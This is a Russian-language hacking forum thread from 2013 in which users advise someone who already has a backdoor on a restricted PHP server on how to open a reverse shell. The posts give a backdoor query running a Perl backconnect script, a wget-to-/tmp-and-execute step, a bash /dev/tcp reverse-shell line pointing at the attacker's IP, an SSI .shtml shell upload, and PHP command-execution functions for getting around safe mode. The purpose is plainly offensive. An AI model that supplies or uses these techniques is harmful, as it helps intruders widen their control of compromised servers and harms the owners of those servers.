PDA

Просмотр полной версии : Backconnect через бекдор


OxoTnik
25.01.2013, 01:47
На сервере не работает ни 1 шел, сейф мод включен

Вопрос:

Как через бекдор, сделать бекконект, не имея шела?

Пытался залить скрипт бэкконекта, и запустить командой


?cmd=system('perl dc.pl 127.0.0.1 8080');


Но увы не получилось, какие ещё есть способы?

Unknown
25.01.2013, 09:10
На сервере не работает ни 1 шел, сейф мод включен
Вопрос:
Как через бекдор, сделать бекконект, не имея шела?
Пытался залить скрипт бэкконекта, и запустить командой
Но увы не получилось, какие ещё есть способы?


Залей через wget бэкконект в /tmp, переместись из текущего каталога в папку /tmp: cd /tmp, дай права на выполнение и запускай.

P.S. возможно не работает команда system, попробуй другие.

Unknown
25.01.2013, 15:11
Вот я и спрашиваю какие другие есть, есть пример ?


passthru, system, exec, shell_exec

Cennarios
25.01.2013, 20:51
Покури вот в этом ключе:

/bin/bash /dev/tcp/ourip/port

Unknown
25.01.2013, 21:08
Покури вот в этом ключе:
/bin/bash /dev/tcp/ourip/port


Скорее всего у него отключены функции для выполнения системных команд

Cennarios
25.01.2013, 22:27
А они вовсе не обязательны. Судя по всему есть возможность аплоадить файлы, но вследствие жестких ограничений на php, стандартные шелы не работают. Можно попробовать залить .shtml файл вида и в его контексте выполнить вышеуказанную схему. Правда там надо немного покопать гугл, есть нюансы при провешивании обратного соединения таким образом.

Dimi4
25.01.2013, 22:43
shtml шелл

еще команды, позволяющие выполнить команду - proc_open, popen

Cennarios
26.01.2013, 11:11
Пробовал, реакций нету...
Аналогично, 0



Тогда зиливай перловский скрипт на backconnect и через него додалбливай.

Dimi4
26.01.2013, 14:20
выведи значение disable_functions